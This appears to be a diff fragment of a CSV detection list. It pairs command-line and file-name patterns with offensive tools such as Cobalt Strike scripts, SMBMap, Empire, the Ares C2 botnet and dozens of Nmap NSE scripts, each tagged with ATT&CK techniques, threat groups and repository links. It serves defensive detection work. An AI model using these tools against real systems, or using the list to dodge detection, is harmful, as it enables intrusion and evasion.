+"* hostenum.py *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z"
+"* --host-file *.txt -u * --prompt --admin --no-banner*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands.
This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"* hostmap-bfk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* hostmap-crtsh.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* hostmap-robtex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -Hosts * -TopPorts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS.
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Portscan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* hping3 *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z"
+"* http://localhost:8080 -o agent*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z"
+"* http_malleable*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used
to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"* http-adobe-coldfusion-apsa1301.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-affiliate-id.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-apache-negotiation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-apache-server-status.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-aspnet-debug.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-auth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-auth-finder.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-avaya-ipoffice-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-awstatstotals-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-axis2-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-backup-finder.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-barracuda-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-bigip-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-cakephp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-chrono.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-cisco-anyconnect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-coldfusion-subzero.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-comments-displayer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-config-backup.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-cookie-flags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-cors.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-cross-domain-policy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-csrf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-date.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-default-accounts.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-devframework.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-dlink-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-dombased-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-domino-enum-passwords.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-drupal-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-drupal-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-errors.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-exif-spider.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-favicon.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-feed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-fetch.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-fileupload-exploiter.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-form-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-form-fuzzer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-frontpage-login.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-generator.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-git.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-gitweb-projects-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-google-malware.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-grep.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-hp-ilo-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-huawei-hg5xx-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-icloud-findmyiphone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* http-icloud-sendmsg.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
